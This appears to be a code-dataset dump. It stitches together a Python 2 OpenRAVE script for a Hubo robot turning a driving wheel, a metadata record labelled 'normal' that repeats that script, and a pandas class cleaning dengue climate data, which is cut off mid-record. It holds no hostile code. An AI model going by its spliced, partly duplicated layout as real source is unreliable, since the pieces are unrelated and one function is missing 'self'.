answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(fastsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringTurning)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj1.txt")
except OSError, e:
# No file cmovetraj
print e
return []
# The following is the same as commented out try-except section
# traj = RaveCreateTrajectory(env,'').deserialize(open('movetraj1.txt','r').read())
# robotid.GetController().SetPath(traj)
# crankid.GetController().SetPath(traj)
# robotid.WaitForController(0)
# crankid.WaitForController(0)
# robotid.GetController().Reset(0)
# crankid.GetController().Reset(0)
try:
answer= cbirrtHubo.solve('traj movetraj1.txt');
answer= cbirrtWheel.solve('traj movetraj1.txt');
self.robotid.WaitForController(0)
# debug
print "traj call answer: ",str(answer)
except openrave_exception, e:
print e
return []
self.robotid.GetController().Reset(0)
self.robotid.SetDOFValues(self.rhandopenvals,self.rhanddofs)
self.robotid.SetDOFValues(self.lhandopenvals,self.lhanddofs)
self.robotid.SetActiveDOFValues(str2num(goalik))
time.sleep(2)
if( self.StopAtKeyStrokes ):
print "Press Enter to plan goalik --> startik "
sys.stdin.readline()
goaljoints = startik
print self.robotid.GetActiveDOFValues()
print TSRChainStringFootandHead
try:
answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj2.txt")
except OSError, e:
# No file cmovetraj
print e
return []
try:
answer= cbirrtHubo.solve('traj movetraj2.txt');
self.robotid.WaitForController(0)
# debug
print "traj call answer: ",str(answer)
except openrave_exception, e:
print e
return []
self.robotid.GetController().Reset(0)
#self.robotid.SetDOFValues(rhandclosevals,rhanddofs)
#self.robotid.SetDOFValues(lhandclosevals,lhanddofs)
self.robotid.SetActiveDOFValues(startik)
time.sleep(1)
if( self.StopAtKeyStrokes ):
print "Press Enter to plan startik --> initconfig "
sys.stdin.readline()
goaljoints = initconfig
print goaljoints
try:
answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj3.txt")
except OSError, e:
# No file cmovetraj
print e
return []
try:
answer= cbirrtHubo.solve('traj movetraj3.txt');
self.robotid.WaitForController(0)
# debug
print "traj call answer: ",str(answer)
except openrave_exception, e:
print e
return []
self.robotid.GetController().Reset(0)
return self.Playback()
if __name__ == "__main__":
planner = HuboPlusWheelTurning()
planner.SetViewer(True)
planner.SetStopKeyStrokes(False)
planner.Run()
planner.KillOpenrave()
|
normal
|
{
"blob_id": "6ad939ab541562efdaacb8b56865e76d1745176a",
"index": 2494,
"step-1": "#!/usr/bin/env python\n# Ben Suay, RAIL\n# May 2013\n# Worcester Polytechnic Institute\n#\n\n# http://openrave.org/docs/latest_stable/command_line_tools/\n# openrave-robot.py /your/path/to/your.robot.xml --info=joints\n# On that page you can find more examples on how to use openrave-robot.py.\n\nfrom openravepy import *\nimport sys\nif not __openravepy_build_doc__:\n from openravepy import *\n from numpy import *\n import numpy\nimport time\nfrom rodrigues import *\nfrom TransformMatrix import *\nfrom str2num import *\nfrom TSR import *\nfrom math import *\nfrom copy import *\nimport os # for file operations\nfrom RaveCBiRRT import *\nfrom base_wheel_turning import *\n\nclass HuboPlusWheelTurning( BaseWheelTurning ):\n\n def __init__(self,\n HuboModelPath = '../../openHubo/huboplus/rlhuboplus.robot.xml',\n WheelModelPath = '../../../drc_common/models/driving_wheel.robot.xml' ):\n\n BaseWheelTurning.__init__( self, HuboModelPath, WheelModelPath )\n\n # Set those variables to show or hide the interface\n # Do it using the member functions\n self.StopAtKeyStrokes = False\n self.ShowUserInterface = False\n self.ViewerStarted = False\n\n\t# Right Hand Joints \n # Open - Closed Values\n self.rhanddofs = range(27,42)\n self.rhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]\n self.rhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]\n\n # Left Hand Joints\n self.lhanddofs = range(42,57)\n self.lhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]\n self.lhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]\n\n def SetRobotConfiguration(self,jointValues):\n print \"SetRobotConfiguration\"\n values = []\n values.append( jointValues['HPY'] ) # 0\n values.append( jointValues['RHY'] ) # 1\n values.append( jointValues['LHY'] ) # 2\n values.append( jointValues['RHR'] ) # 3\n values.append( jointValues['HPY'] ) # 4\n values.append( jointValues['LHR'] ) # 5\n values.append( jointValues['LHP'] ) # 6\n values.append( jointValues['RKP'] ) # 7\n values.append( jointValues['LKP'] ) # 8\n values.append( jointValues['RAP'] ) # 9\n values.append( jointValues['LAP'] ) # 10\n values.append( jointValues['RAR'] ) # 11\n values.append( jointValues['LAR'] ) # 12\n values.append( jointValues['RSP'] ) # 13 \n values.append( jointValues['LSP'] ) # 14 \n values.append( jointValues['RSR'] ) # 15\n values.append( jointValues['LSR'] ) # 16\n values.append( jointValues['RSY'] ) # 17 \n values.append( jointValues['LSY'] ) # 18\n values.append( jointValues['REP'] ) # 19\n values.append( jointValues['LEP'] ) # 20\n values.append( jointValues['RWY'] ) # 21\n values.append( jointValues['LWY'] ) # 22\n values.append( jointValues['RWP'] ) # 23\n values.append( jointValues['LWP'] ) # 24\n values.append( jointValues['HNR'] ) # 25\n values.append( jointValues['HNP'] ) # 26\n\n for i in range(27,57):\n values.append(0)\n\n# values.append( jointValues['rightIndexKnuckle2'] ) # 27\n# values.append( jointValues['rightIndexKnuckle3'] ) # 28\n# values.append( jointValues['rightIndexKnuckle1'] ) # 29\n# values.append( jointValues['rightMiddleKnuckle2'] ) # 30\n# values.append( jointValues['rightMiddleKnuckle3'] ) # 31\n# values.append( jointValues['rightMiddleKnuckle1'] ) # 32\n# values.append( jointValues['rightRingKnuckle2'] ) # 33\n# values.append( jointValues['rightRingKnuckle3'] ) # 34\n# values.append( jointValues['rightRingKnuckle1'] ) # 35\n# values.append( jointValues['rightPinkyKnuckle2'] ) # 36\n# values.append( jointValues['rightPinkyKnuckle3'] ) # 37\n# values.append( jointValues['rightPinkyKnuckle1'] ) # 38\n# values.append( jointValues['rightThumbKnuckle2'] ) # 39\n# values.append( jointValues['rightThumbKnuckle3'] ) # 40\n# values.append( jointValues['rightThumbKnuckle1'] ) # 41\n# values.append( jointValues['leftIndexKnuckle2'] ) # 42\n# values.append( jointValues['leftIndexKnuckle3'] ) # 43\n# values.append( jointValues['leftIndexKnuckle1'] ) # 44\n# values.append( jointValues['leftMiddleKnuckle2'] ) # 45\n# values.append( jointValues['leftMiddleKnuckle3'] ) # 46\n# values.append( jointValues['leftMiddleKnuckle1'] ) # 47\n# values.append( jointValues['leftRingKnuckle2'] ) # 48\n# values.append( jointValues['leftRingKnuckle3'] ) # 49\n# values.append( jointValues['leftRingKnuckle1'] ) # 50\n# values.append( jointValues['leftPinkyKnuckle2'] ) # 51\n# values.append( jointValues['leftPinkyKnuckle3'] ) # 52\n# values.append( jointValues['leftPinkyKnuckle1'] ) # 53\n# values.append( jointValues['leftThumbKnuckle2'] ) # 54\n# values.append( jointValues['leftThumbKnuckle3'] ) # 55\n# values.append( jointValues['leftThumbKnuckle1'] ) # 56\n self.robotid.SetDOFValues( values )\n \n def Run(self):\n \n self.RemoveFiles()\n\n # This is a list of handles of the objects that are\n # drawn on the screen in OpenRAVE Qt-Viewer.\n # Keep appending to the end, and pop() if you want to delete.\n handles = [] \n\n normalsmoothingitrs = 150;\n fastsmoothingitrs = 20;\n\n self.StartViewerAndSetWheelPos( handles )\n\n # Wheel Joint Index \n crankjointind = 0\n # Set the wheel joints back to 0 for replanning\n self.crankid.SetDOFValues([0],[crankjointind])\n self.crankid.GetController().Reset(0)\n\n manips = self.robotid.GetManipulators()\n crankmanip = self.crankid.GetManipulators()\n \n try:\n cbirrtHubo = RaveCBiRRT(self.env,'rlhuboplus')\n cbirrtWheel = RaveCBiRRT(self.env,'crank')\n except openrave_exception, e:\n print e\n return []\n\n # Keep Active Joint Indices\n # Note that 0 is the driving wheel\n #activedofs = [0]\n activedofs = []\n for m in manips:\n # print m.GetArmIndices()\n activedofs.extend(m.GetArmIndices())\n\n # Sort Active Joint Indices\n activedofs.sort()\n #print activedofs\n\n # Set Elbows and Thumbs Joint Values\n self.robotid.SetDOFValues([-0.95,-0.95,1,1],[19,20,41,56]) \n self.robotid.SetActiveDOFs(activedofs)\n\n # Current configuration of the robot is its initial configuration\n initconfig = self.robotid.GetActiveDOFValues()\n\n print \"robot init config : \"\n print initconfig\n\n # List of Robot Links\n links = self.robotid.GetLinks()\n \n # List of Wheel (Crank Links)\n cranklinks = self.crankid.GetLinks()\n \n # End Effector Transforms\n Tee = []\n for i in range(len(manips)):\n # Returns End Effector Transform in World Coordinates\n Tlink = manips[i].GetEndEffectorTransform()\n Tee.append(Tlink)\n\n \n # Get Transformation Matrix for the Wheel\n # Note that crank's links are not rotated\n # If you want use the wheel's end effector's transformation\n # matrix (which is 23 degrees tilted) then see\n # CTee matrix below.\n #\n # crank has two links: \n # 0) pole - the blue cylinder in the model, and, \n # 1) crank - the driving wheel itself.\n jointtm = cranklinks[0].GetTransform()\n # handles.append(misc.DrawAxes(env,matrix(jointtm),1))\n \n\n # We can also get the transformation matrix\n # with the following command as a string\n jointtm_str = cbirrtHubo.solve('GetJointTransform name crank jointind '+str(crankjointind))\n # And then we can convert the string to a 1x12 array\n jointtm_str = jointtm_str.replace(\" \",\",\")\n jointtm_num = eval('['+jointtm_str+']')\n\n # In this script we will use jointtm.\n # jointtm_str and jointtm_num are given as example.\n \n # Crank Transform End Effector in World Coordinates\n # This is the transformation matrix of the end effector \n # named \"dummy\" in the xml file.\n # Note that dummy is tilted 23 degress around its X-Axis\n CTee = crankmanip[0].GetEndEffectorTransform()\n\n tilt_angle_deg = acos(dot(linalg.inv(CTee),jointtm)[1,1])*180/pi\n tilt_angle_rad = acos(dot(linalg.inv(CTee),jointtm)[1,1]) \n\n # Center of Gravity Target\n cogtarg = [-0.05, 0.085, 0]\n #if self.ShowUserInterface :\n #cogtm = MakeTransform(rodrigues([0,0,0]),transpose(matrix(cogtarg)))\n #handles.append(misc.DrawAxes(self.env,cogtm,1))\n\n # polyscale: changes the scale of the support polygon\n # polytrans: shifts the support polygon around\n footlinknames = ' Body_RAR Body_LAR polyscale 0.5 0.5 0 polytrans -0.015 0 0 '\n #footlinknames = ' Body_RAR Body_LAR polyscale 0.7 0.5 0 polytrans -0.015 0 0 '\n #footlinknames = ' Body_RAR Body_LAR polyscale 1.0 1.0 0 polytrans 0 0 0 '\n\n # What is this?\n handrot = rodrigues([0,-pi/2,0])\n \n # Translation Offset from the wheel center for the hands\n transoffset = [0, 0.15, 0];\n \n # Figure out where to put the left hand on the wheel\n temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))\n temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))\n \n # Left Hand Pose in World Coordinates\n T0_LH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,0.15,0]))))\n\n # Uncomment if you want to see where T0_LH1 is \n # handles.append(misc.DrawAxes(env,matrix(T0_LH1),1))\n\n # Figure out where to put the right hand on the wheel\n temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))\n temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))\n # Right Hand Pose in World Coordinates\n T0_RH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,-0.15,0]))))\n \n # Uncomment if you want to see where T0_RH1 is \n # handles.append(misc.DrawAxes(env,matrix(T0_RH1),1))\n \n # Define Task Space Region strings\n # Left Hand\n TSRString1 = SerializeTSR(0,'NULL',T0_LH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n\n # Right Hand\n TSRString2 = SerializeTSR(1,'NULL',T0_RH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n \n # Left Foot\n TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n\n # Head\n # Grasp transform in Head coordinates\n Tw0_eH = eye(4) \n # How much freedom do we want to give to the Head\n # [x,x,y,y,z,z,R,R,P,P,Y,Y]\n Bw0H = matrix([0,0,-0.1,0.1,-0.1,0.01,0,0,0,0,0,0])\n TSRString4 = SerializeTSR(4,'NULL',Tee[4],Tw0_eH,Bw0H)\n\n # We defined Task Space Regions. Now let's concatenate them.\n TSRChainStringGrasping = SerializeTSRChain(0,1,0,1,TSRString1,'NULL',[])+' '+SerializeTSRChain(0,1,0,1,TSRString2,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString3,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString4,'NULL',[])\n \n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan initconfig --> startik\"\n sys.stdin.readline()\n \n # Get a trajectory from initial configuration to grasp configuration\n with self.robotid:\n try:\n answer = cbirrtHubo.solve('RunCBiRRT psample 0.2 supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' '+TSRChainStringGrasping)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj0.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n # The following is the same as commented out try-except section\n traj = RaveCreateTrajectory(self.env,'').deserialize(open('movetraj0.txt','r').read()) \n self.robotid.GetController().SetPath(traj) \n self.robotid.WaitForController(0)\n self.robotid.GetController().Reset(0) \n # Reset(0) releases the controller, otherwise after calling \n # SetPath the robot controller actively holds the trajectory's final joint values\n \n # Instead of 4 lines above, we could use the following block\n # to play the trajectory\n #\n # try:\n # answer= cbirrtHubo.solve('traj movetraj0.txt');\n # robotid.WaitForController(0)\n # sys.stdin.readline()\n # # debug\n # print \"traj call answer: \",str(answer)\n # except openrave_exception, e:\n # print e\n \n \n # Get the current configuration of the robot\n # and assign it to startik (start of the wheel\n # rotation path).\n startik = self.robotid.GetActiveDOFValues()\n \n # Left Hand's index is less than the right hand.\n # Hence it is evaluated first by the CBiRRT Module.\n # That's why We need to define the right hand's \n # transform relative to the wheel (ask Dmitry Berenson\n # about this for more information).\n temp1 = MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0])))\n temp2 = MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0])))\n # Rotate the wheel's transform to a suitable pose\n # for the Left Hand\n # T0_w0L stands for: \n # left hand's transform on wheel in world coordinates\n T0_w0L = dot(dot(CTee,temp1),temp2)\n # This is what's happening: \n #\n # Tw0L_0 = linalg.inv(T0_w0L)\n # Tw0L_LH1 = Tw0L_0*T0_LH1\n #\n # Left hand's transform in wheel's coordinates\n Tw0L_LH1 = dot(linalg.inv(T0_w0L),T0_LH1)\n # Transform of the left hand's end effector in wheel's coords.\n # Required by CBiRRT\n Tw0_eL = Tw0L_LH1\n # How much freedom do we want to give to the left hand\n Bw0L = matrix([0,0,0,0,0,0,0,pi,0,0,0,0])\n\n # Right Hand's transforms:\n T0_crankcrank = self.crankid.GetManipulators()[0].GetTransform()\n T0_w0R = MakeTransform(rodrigues([tilt_angle_rad,0,0]),transpose(matrix([0,0,0])))\n # End effector transform in wheel coordinates\n Tw0_eR = dot(linalg.inv(T0_crankcrank),T0_RH1)\n\n #handles.append(misc.DrawAxes(env,matrix(Tw0_eR),1))\n\n # How much freedom? (note: in frame of crank)\n Bw0R = matrix([0,0,0,0,0,0,0,0,0,0,0,0])\n\n # Head's transforms:\n T0_w0H = Tee[4]\n Tw0_eH = eye(4);\n Bw0H = matrix([-0.05,0.05,-0.1,0.1,-100,100,-pi,pi,-pi,pi,-pi,pi])\n \n \n # Define Task Space Regions\n # Left Hand\n TSRString1 = SerializeTSR(0,'NULL',T0_w0L,Tw0_eL,Bw0L)\n # Right Hand\n TSRString2 = SerializeTSR(1,'crank crank',T0_w0R,Tw0_eR,Bw0R)\n # Left Foot\n TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))\n # Head\n TSRString4 = SerializeTSR(4,'NULL',T0_w0H,Tw0_eH,Bw0H)\n \n TSRChainStringFootOnly = SerializeTSRChain(0,0,1,1,TSRString3,'NULL',[])\n\n TSRChainStringFootandHead = TSRChainStringFootOnly+' '+SerializeTSRChain(0,0,1,1,TSRString4,'NULL',[])\n\n TSRChainStringTurning = SerializeTSRChain(0,0,1,1,TSRString1,'crank',matrix([crankjointind]))+' '+SerializeTSRChain(0,0,1,1,TSRString2,'NULL',[])+' '+TSRChainStringFootandHead\n \n # Calculate hand transforms after rotating the wheel (they will help us find the goalik):\n # How much do we want to rotate the wheel?\n crank_rot = pi/6.5\n \n # Which joint do we want the CBiRRT to mimic the TSR for?\n TSRChainMimicDOF = 1\n \n # Create the transform for the wheel that we would like to reach to\n Tcrank_rot = MakeTransform(rodrigues([crank_rot,0,0]),transpose(matrix([0,0,0])))\n \n # What is this?\n temp = MakeTransform(rodrigues([0,0,crank_rot]),transpose(matrix([0,0,0])))\n \n # Rotate the left hand's transform on the wheel in world transform \"crank_rot\" radians around it's Z-Axis\n T0_cranknew = dot(T0_w0L,Tcrank_rot)\n \n # Where will the left hand go after turning the wheel?\n # This is what's happening:\n #\n # Tcranknew_LH2 = dot(Tw0L_0,T0_LH1) --> Left hand in wheel's coordinate\n # T0_LH2 = dot(T0_cranknew,Tcranknew_LH2) --> Left hand rotated around wheel's origin\n T0_LH2 = dot(T0_cranknew,dot(linalg.inv(T0_w0L),T0_LH1))\n\n # Uncomment to see T0_LH2\n # handles.append(misc.DrawAxes(env,matrix(T0_LH2),1))\n \n # Where will the right hand go after turning the wheel?\n T0_RH2 = dot(T0_crankcrank,dot(temp,dot(linalg.inv(T0_crankcrank),T0_RH1)))\n\n # Uncomment to see T0_RH2\n # handles.append(misc.DrawAxes(env,matrix(T0_RH2),1))\n\n arg1 = str(cogtarg).strip(\"[]\").replace(', ',' ')\n arg2 = trans_to_str(T0_LH2)\n arg3 = trans_to_str(T0_RH2)\n arg4 = trans_to_str(Tee[2])\n\n # print arg1\n # print arg2\n # print arg3\n # print arg4\n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to find a goalIK\"\n sys.stdin.readline()\n\n self.crankid.SetDOFValues([crank_rot],[crankjointind])\n\n goalik = cbirrtHubo.solve('DoGeneralIK exec supportlinks 2 '+footlinknames+' movecog '+arg1+' nummanips 3 maniptm 0 '+arg2+' maniptm 1 '+arg3+' maniptm 2 '+arg4)\n \n # print \"goalIK\"\n # print goalik\n\n self.robotid.SetActiveDOFValues(str2num(goalik))\n self.crankid.SetDOFValues([crank_rot],[crankjointind])\n \n if( self.StopAtKeyStrokes ):\n print \"Press Enter to go to startik\"\n sys.stdin.readline()\n\n # Get a trajectory from goalik to grasp configuration\n goaljoints = deepcopy(goalik)\n for i in range(TSRChainMimicDOF):\n goaljoints += ' 0'\n\n goaljoints = str2num(goaljoints)\n\n self.robotid.SetActiveDOFValues(startik)\n time.sleep(0.5)\n self.robotid.SetDOFValues(self.rhandclosevals,self.rhanddofs)\n self.robotid.SetDOFValues(self.lhandclosevals,self.lhanddofs)\n # Close hands to start \"turning\" the wheel\n self.crankid.SetDOFValues([0],[crankjointind])\n time.sleep(0.5)\n \n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan startik --> goalik (DMITRY!!!)\"\n sys.stdin.readline()\n\n print self.robotid.GetActiveDOFValues()\n print TSRChainStringTurning\n\n try:\n answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(fastsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringTurning)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n \n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj1.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n # The following is the same as commented out try-except section\n # traj = RaveCreateTrajectory(env,'').deserialize(open('movetraj1.txt','r').read()) \n # robotid.GetController().SetPath(traj) \n # crankid.GetController().SetPath(traj)\n # robotid.WaitForController(0)\n # crankid.WaitForController(0)\n # robotid.GetController().Reset(0)\n # crankid.GetController().Reset(0)\n \n try:\n answer= cbirrtHubo.solve('traj movetraj1.txt');\n answer= cbirrtWheel.solve('traj movetraj1.txt');\n self.robotid.WaitForController(0)\n # debug\n print \"traj call answer: \",str(answer)\n except openrave_exception, e:\n print e\n return []\n\n self.robotid.GetController().Reset(0)\n self.robotid.SetDOFValues(self.rhandopenvals,self.rhanddofs)\n self.robotid.SetDOFValues(self.lhandopenvals,self.lhanddofs)\n self.robotid.SetActiveDOFValues(str2num(goalik))\n\n time.sleep(2)\n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan goalik --> startik \"\n sys.stdin.readline()\n\n \n\n goaljoints = startik\n\n print self.robotid.GetActiveDOFValues()\n print TSRChainStringFootandHead\n try:\n answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj2.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n try:\n answer= cbirrtHubo.solve('traj movetraj2.txt');\n self.robotid.WaitForController(0)\n # debug\n print \"traj call answer: \",str(answer)\n except openrave_exception, e:\n print e\n return []\n \n self.robotid.GetController().Reset(0)\n #self.robotid.SetDOFValues(rhandclosevals,rhanddofs)\n #self.robotid.SetDOFValues(lhandclosevals,lhanddofs)\n\n self.robotid.SetActiveDOFValues(startik)\n time.sleep(1)\n\n if( self.StopAtKeyStrokes ):\n print \"Press Enter to plan startik --> initconfig \"\n sys.stdin.readline()\n\n goaljoints = initconfig\n print goaljoints\n try:\n answer = cbirrtHubo.solve('RunCBiRRT supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' jointgoals '+str(len(goaljoints))+' '+Serialize1DMatrix(matrix(goaljoints))+' '+TSRChainStringFootandHead)\n print \"RunCBiRRT answer: \",str(answer)\n except openrave_exception, e:\n print \"Cannot send command RunCBiRRT: \"\n print e\n return []\n\n try:\n os.rename(\"cmovetraj.txt\",\"movetraj3.txt\")\n except OSError, e:\n # No file cmovetraj\n print e\n return []\n\n try:\n answer= cbirrtHubo.solve('traj movetraj3.txt');\n self.robotid.WaitForController(0)\n # debug\n print \"traj call answer: \",str(answer)\n except openrave_exception, e:\n print e\n return []\n\n self.robotid.GetController().Reset(0)\n \n return self.Playback()\n\n\nif __name__ == \"__main__\":\n planner = HuboPlusWheelTurning()\n planner.SetViewer(True)\n planner.SetStopKeyStrokes(False)\n planner.Run()\n planner.KillOpenrave()\n\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Copyright (c) 2021, Omid Erfanmanesh, All rights reserved.
import math
import numpy as np
import pandas as pd
from data.based.based_dataset import BasedDataset
from data.based.file_types import FileTypes
class DengueInfection(BasedDataset):
def __init__(self, cfg, development):
super(DengueInfection, self).__init__(cfg=cfg, dataset_type=FileTypes.TSV, development=development)
if development:
self.total_cases()
self.extract_month()
self.extract_quarter()
self.week_start_date()
# self.six_month()
# self.week_split()
self.city()
self.cyclic_encoder(col='weekofyear',max_val=53)
self.cyclic_encoder(col='month', max_val=12)
self.persiann_precip_mm()
self.ncep_avg_temp_k()
self.ncep_diur_temp_rng_k()
self.ncep_max_air_temp_k()
self.ncep_min_air_temp_k()
self.ncep_air_temp_k()
self.ncep_dew_point_temp_k()
self.avg_temp_c()
self.diur_temp_rng_c()
self.max_temp_c()
self.min_temp_c()
self.precip_mm()
def cyclic_encoder(self, col, max_val):
self.df[col + '_sin'] = np.sin(2 * np.pi * self.df[col] / max_val)
self.df[col + '_cos'] = np.cos(2 * np.pi * self.df[col] / max_val)
return self.df
def fill_nan(self, col):
table = pd.pivot_table(self.df, values=col, index=['year', 'month'],
columns=['city'], aggfunc=np.mean)
self.df[col + '_no_nans'] = self.df[col]
for index, row in self.df.iterrows():
if math.isnan(row[col]):
query = table.query(f'year == "{row["year"]}" & month =="{row["month"]}"').reset_index()
city = row['city']
value = query[city]
if value.empty:
value = self.df.loc[self.df['year'] == row["year"]][col].mean()
self.df.loc[index, [col + '_no_nans']] = value
continue
self.df.loc[index, [col + '_no_nans']] = value[0]
def extract_month(self):
self.df['week_start_date'] = pd.to_datetime(self.df['week_start_date'])
self.df['month'] = self.df['week_start_date'].dt.month
def extract_quarter(self):
self.df['quarter'] = self.df['week_start_date'].dt.quarter
def week_split(self):
self.df['week_split'] = self.df['weekofyear'].apply(lambda x: 0 if x < 25 else 1)
def season_of_date(date):
year = str(date.year)
seasons = {'spring': pd.date_range(start='21/03/' + year, end='20/06/' + year),
'summer': pd.date_range(start='21/06/' + year, end='22/09/' + year),
'autumn': pd.date_range(start='23/09/' + year, end='20/12/' + year)}
if date in seasons['spring']:
return 'spring'
if date in seasons['summer']:
return 'summer'
if date in seasons['autumn']:
return 'autumn'
else:
return 'winter'
def kelvin_to_celsius(self, kelvin):
if kelvin is None:
return kelvin
return kelvin - 273.15
def year(self):
pass
def week_of_year(self):
pass
def week_start_date(self):
pass
def six_month(self):
self.df['six'] = self.df['month'].apply(lambda x: 1 if x > 6 else 0)
def persiann_precip_mm(self):
self.fill_nan(col='PERSIANN_precip_mm')
def ncep_air_temp_k(self):
self.df['NCEP_air_temp_c'] = self.df['NCEP_air_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_air_temp_c')
def ncep_avg_temp_k(self):
self.df['NCEP_avg_temp_c'] = self.df['NCEP_avg_temp_k'].apply(lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_avg_temp_c')
def ncep_dew_point_temp_k(self):
"""
dew point temperature in Kelvin degrees measured by NCEP CFSR;
:rtype: object
"""
self.df['NCEP_dew_point_temp_c'] = self.df['NCEP_dew_point_temp_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_dew_point_temp_c')
def ncep_max_air_temp_k(self):
self.df['NCEP_max_air_temp_c'] = self.df['NCEP_max_air_temp_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_max_air_temp_c')
def ncep_min_air_temp_k(self):
self.df['NCEP_min_air_temp_c'] = self.df['NCEP_min_air_temp_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_min_air_temp_c')
def ncep_precip_kg_per_m2(self):
self.fill_nan(col='NCEP_precip_kg_per_m2')
def ncep_humidity_percent(self):
self.fill_nan(col='NCEP_humidity_percent')
def ncep_precip_mm(self):
self.fill_nan(col='NCEP_precip_mm')
def ncep_humidity_g_per_kg(self):
self.fill_nan(col='NCEP_humidity_g_per_kg')
def ncep_diur_temp_rng_k(self):
self.df['NCEP_diur_temp_rng_c'] = self.df['NCEP_diur_temp_rng_k'].apply(
lambda k: self.kelvin_to_celsius(kelvin=k))
self.fill_nan(col='NCEP_diur_temp_rng_c')
def avg_temp_c(self):
self.fill_nan(col='avg_temp_c')
def diur_temp_rng_c(self):
self.fill_nan(col='diur_temp_rng_c')
def max_temp_c(self):
self.fill_nan(col='max_temp_c')
def min_temp_c(self):
self.fill_nan(col='min_temp_c')
def precip_mm(self):
self.fill_nan(col='precip_mm')
def total_cases(self):
self.df = self.df[self.df['total_cases'] < 41]
def city(self):
self.df = self.df[self.df['city'] != 'sj']
|
normal
|
{
"blob_id": "93ac8a1f795f7809a3e88b56ce90bf1d31706554",
"index": 1139,
